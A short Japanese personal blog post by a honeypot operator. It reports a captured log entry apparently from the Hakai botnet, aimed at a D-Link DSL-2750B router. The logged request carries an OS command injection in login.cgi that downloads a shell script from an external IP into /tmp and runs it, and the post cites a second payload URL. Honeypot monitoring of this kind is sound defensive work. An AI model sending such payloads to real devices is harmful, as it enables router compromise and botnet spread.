HAKAIボットネットからの攻撃と思われるログ(2018-9-24)
//
短めです。下のログはdionaeaで検知したログ。スペースと改行の表記がうまくできていないのはご了承ください。
stream = [('in', b'GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1\x0d\x0aConnection: keep-alive\x0d\x0aAccept-Encoding: gzip, deflate\x0d\x0aAccept: /\x0d\x0aUser-Agent: Hakai/2.0\x0d\x0a\x0d\x0a')
個人的に今日の昼ごろ、こちらのサイトさんでちょうどボットネットの攻撃について読んでいたので、自分のハニポを調べたらありました。(ちょっと嬉しい)引用ですが、
新しいサンプルには、D-LinkのDSL-2750B デバイスを対象としたOS Command Injectionエクスプロイトも組み込まれていることが分かりました。これらより新しいサンプルは、以前のサンプルと同じ攻撃手法、暗号化キー、C2を使っています。
とありますが、今回の攻撃ログはこのD-Linkルータを狙ったものと思われます。また引用元のペイロードは"hxxp:// 178[.]128.185.250/e"ですが、こちらも若干変わっています。
この日は37件のhttpへのリクエストに対して1件がこのログでした。
と、今更な内容でしたが、個人的なまとめでした。